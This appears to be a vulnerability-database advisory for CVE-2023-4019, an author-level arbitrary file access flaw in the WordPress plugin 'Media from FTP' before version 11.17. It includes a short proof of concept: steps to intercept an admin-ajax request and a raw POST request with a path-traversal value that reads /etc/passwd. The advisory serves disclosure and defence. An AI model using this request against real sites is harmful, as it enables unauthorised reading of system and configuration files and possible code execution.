Lucene search
Dmitrii IgnatyevWPVDB-ID:0D323B07-C6E7-4ABA-85BC-64659AD0C85DHistoryAug 14, 2023 - 12:00 a.m.
Media from FTP < 11.17 - Author+ Arbitrary File Access
2023-08-1400:00:00
Dmitrii Ignatyev
wpscan.com
5
ftp access
arbitrary file access
rce
multisite setup
Description The plugin does not properly limit who can use the plugin, which may allow users with author+ privileges to move files around, like wp-config.php, which may lead to RCE in some cases. In 11.16, the manage_options capability was used, however is still insufficient in case of MultiSite setups
PoC
- Go to /wp-admin/admin.php?page=mediafromftp-search-register 2) Select any file from the media text list below 3) Click “Update Media” 4) Intercept request with action=mediafromftp-update-ajax-action 5) Change “new_url” by adding the following to the file path: /…/…/…/…/…/…/…/…/…/…/etc/passwd POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1 action=mediafromftp-update-ajax-action&nonce;=9c0c0115ee&maxcount;=1&new;_url=/etc/passwd&new;_datetime=2023-07-10+20%3A53%3A36
Related
wpexploit
wpexploit
Media from FTP < 11.17 - Author+ Arbitrary File Access
2023-08-14 00:00:00
cvelist
cvelist
CVE-2023-4019 Media from FTP < 11.17 - Author+ Arbitrary File Access
2023-09-04 11:27:02
nvd
nvd
CVE-2023-4019
2023-09-04 12:15:10
cve
cve
CVE-2023-4019
2023-09-04 12:15:10
prion
prion
Code injection
2023-09-04 12:15:00
wordfence
wordfence
AI Score
8.6
Confidence
High
EPSS
0.001
Percentile
37.1%
Related for WPVDB-ID:0D323B07-C6E7-4ABA-85BC-64659AD0C85D